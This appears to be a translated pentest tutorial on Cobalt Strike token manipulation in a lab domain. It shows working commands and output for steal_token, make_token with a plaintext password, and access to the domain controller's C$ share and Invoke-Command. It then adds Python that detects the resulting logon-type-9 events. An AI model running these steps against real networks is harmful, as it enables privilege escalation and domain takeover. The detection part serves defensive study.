The commands are demonstrated below. We currently hold a SYSTEM-level session on host WIN-72A8ERDSF2P and want to read files on host WIN-P2AASSD1AF1 (the domain controller of the TEAMSSIX domain). Running dir directly against it returns access denied:
```
beacon> shell dir \\WIN-P2AASSD1AF1\C$
[*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$
[+] host called home, sent: 55 bytes
[+] received output:
拒绝访问。
```
First, list the processes on the current host with ps:
```
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List
 PID   PPID  Name                    Arch  Session  User
 ---   ----  ----                    ----  -------  -----
 0     0     [System Process]
 4     0     System                  x64   0        NT AUTHORITY\SYSTEM
 …… (too much output, omitted here) ……
 3720  524   taskhost.exe            x64   2        WIN-75F8PRJM4TP\Administrator
 4092  236   dwm.exe                 x64   3        TEAMSSIX\Administrator
```
The process list shows that the TEAMSSIX domain administrator is currently logged on to the host where our SYSTEM session runs, so we can use steal_token [pid] to steal the token of the TEAMSSIX\Administrator account:
```
beacon> steal_token 4092
[*] Tasked beacon to steal token from PID 4092
[+] host called home, sent: 12 bytes
[+] Impersonated TEAMSSIX\administrator
```
Check the uid of the current session:
```
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are TEAMSSIX\administrator (admin)
```
Try again to list the files on the domain controller:
```
beacon> shell dir \\WIN-P2AASSD1AF1\C$
[*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$
[+] host called home, sent: 55 bytes
[+] received output:
 驱动器 \\WIN-P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269-89A7

 \\WIN-P2AASSD1AF1\C$ 的目录

2020/07/16  21:24    <DIR>          Program Files
2020/07/16  21:52    <DIR>          Program Files (x86)
2020/07/17  23:00    <DIR>          Users
2020/07/26  00:55    <DIR>          Windows
               0 个文件              0 字节
               4 个目录 28,493,299,712 可用字节
```
The share is now accessible. rev2self removes the stolen token:
```
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
```
Checking the uid again shows the session is back to the original SYSTEM identity, and files on WIN-P2AASSD1AF1 are denied once more:
```
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> shell dir \\WIN-P2AASSD1AF1\C$
[*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$
[+] host called home, sent: 55 bytes
[+] received output:
拒绝访问。
```
Next, create a token with make_token and the account's plaintext password, then list the domain controller's files again and run a command on it with Invoke-Command:

```
beacon> make_token TEAMSSIX\administrator Test111!
[*] Tasked beacon to create a token for TEAMSSIX\administrator
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> shell dir \\WIN-P2AASSD1AF1\C$
[*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$
[+] host called home, sent: 55 bytes
[+] received output:
 驱动器 \\WIN-P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269-89A7

 \\WIN-P2AASSD1AF1\C$ 的目录

2020/07/16  21:24    <DIR>          Program Files
2020/07/16  21:52    <DIR>          Program Files (x86)
2020/07/17  23:00    <DIR>          Users
2020/07/26  00:55    <DIR>          Windows
               0 个文件              0 字节
               4 个目录 28,493,299,712 可用字节

beacon> powershell Invoke-Command -computer WIN-P2AASSD1AF1 -ScriptBlock {whoami}
[*] Tasked beacon to run: Invoke-Command -computer WIN-P2AASSD1AF1 -ScriptBlock {whoami}
[+] host called home, sent: 231 bytes
[+] received output:
teamssix\administrator
```
If the password is wrong, the two commands above (the dir against the C$ share and the Invoke-Command) report 登录失败: 未知的用户名或错误密码。 (logon failure: unknown user name or bad password). As before, rev2self drops the current token and restores the original SYSTEM identity.
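From the defender's side, the make_token step above leaves a specific trace: make_token calls LogonUser with LOGON32_LOGON_NEW_CREDENTIALS, which Windows records as Security event 4624 with logon type 9 (NewCredentials). The local identity is unchanged (hence "Impersonated NT AUTHORITY\SYSTEM" and getuid still reporting SYSTEM) while the supplied account is used for outbound SMB and WinRM. The following is an added example, not code from the original post or from Cobalt Strike: it runs that check over constructed 4624 records. The event records, the privileged-account watch list and the process paths are all assumptions made for the example; steal_token duplicates an existing token rather than creating a new logon session, so this check does not cover it.

```python
"""Added example (not from the original post): flag 4624 logons of type 9.

Logon type 9 (NewCredentials) is what a make_token leaves in the Security
log. It is also produced by legitimate "runas /netonly", so the result is a
lead to triage, not a verdict. All events below are constructed sample data.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class LogonEvent:
    """The 4624 fields this check needs, accounts in DOMAIN\\user form."""
    event_id: int
    logon_type: int
    subject_user: str   # SubjectDomainName\SubjectUserName: the caller of LogonUser
    target_user: str    # TargetDomainName\TargetUserName: the credentials supplied
    host: str           # Computer that logged the event
    process: str        # ProcessName that performed the logon


SYSTEM = r"NT AUTHORITY\SYSTEM"

# Assumed watch list of accounts whose use as outbound credentials is always
# worth a look; a real deployment would load this from the directory.
PRIVILEGED_ACCOUNTS: Set[str] = {r"TEAMSSIX\Administrator"}

# Constructed sample: an interactive logon, a service logon, the type-9 logon
# that a make_token from a SYSTEM beacon leaves behind, a type-9 logon from a
# user's own "runas /netonly", and the matching logoff. Process paths are
# placeholders, not real indicators.
SAMPLE_EVENTS: List[LogonEvent] = [
    LogonEvent(4624, 2, SYSTEM, r"TEAMSSIX\Administrator", "WIN-72A8ERDSF2P",
               r"C:\Windows\System32\winlogon.exe"),
    LogonEvent(4624, 5, SYSTEM, SYSTEM, "WIN-72A8ERDSF2P",
               r"C:\Windows\System32\services.exe"),
    LogonEvent(4624, 9, SYSTEM, r"TEAMSSIX\administrator", "WIN-72A8ERDSF2P",
               r"C:\Windows\Temp\placeholder.exe"),
    LogonEvent(4624, 9, r"TEAMSSIX\jdoe", r"TEAMSSIX\jdoe-adm", "WIN-72A8ERDSF2P",
               r"C:\Windows\System32\svchost.exe"),
    LogonEvent(4634, 9, r"TEAMSSIX\jdoe", r"TEAMSSIX\jdoe-adm", "WIN-72A8ERDSF2P",
               r"C:\Windows\System32\svchost.exe"),
]


def _norm(account: str) -> str:
    """Case-fold an account name; Windows account names are case-insensitive."""
    return account.lower()


def is_new_credentials_logon(ev: LogonEvent) -> bool:
    """True for a successful logon (4624) recorded with LogonType 9."""
    return ev.event_id == 4624 and ev.logon_type == 9


def severity(ev: LogonEvent, privileged: Set[str]) -> str:
    """Type 9 issued from SYSTEM, or onto a watched account, rates high.

    SYSTEM has no reason to run "runas /netonly", and any alternate
    credentials for a privileged account deserve a look. A plain user-to-user
    type-9 logon only rates medium and needs context before anyone acts on it.
    """
    watched = {_norm(p) for p in privileged}
    if _norm(ev.subject_user) == _norm(SYSTEM) or _norm(ev.target_user) in watched:
        return "high"
    return "medium"


def find_new_credentials_logons(
    events: Iterable[LogonEvent], privileged: Set[str] = PRIVILEGED_ACCOUNTS
) -> List[Dict[str, str]]:
    """Return one finding per type-9 logon, highest severity first."""
    findings = [
        {
            "host": ev.host,
            "subject": ev.subject_user,
            "new_credentials": ev.target_user,
            "process": ev.process,
            "severity": severity(ev, privileged),
        }
        for ev in events
        if is_new_credentials_logon(ev)
    ]
    # sort is stable, so events of equal severity keep their log order
    findings.sort(key=lambda f: 0 if f["severity"] == "high" else 1)
    return findings


if __name__ == "__main__":
    for f in find_new_credentials_logons(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: {f['subject']} obtained network "
              f"credentials for {f['new_credentials']} via {f['process']}")
```

Run against the constructed sample this reports two findings: the SYSTEM-to-Administrator logon as high, and the user's own netonly logon as medium. In a real pipeline the same filter applies to 4624 records pulled from the Security log or a SIEM; correlating the finding with subsequent outbound SMB or WinRM from the same host, as in the dir and Invoke-Command steps above, is what turns the lead into an incident.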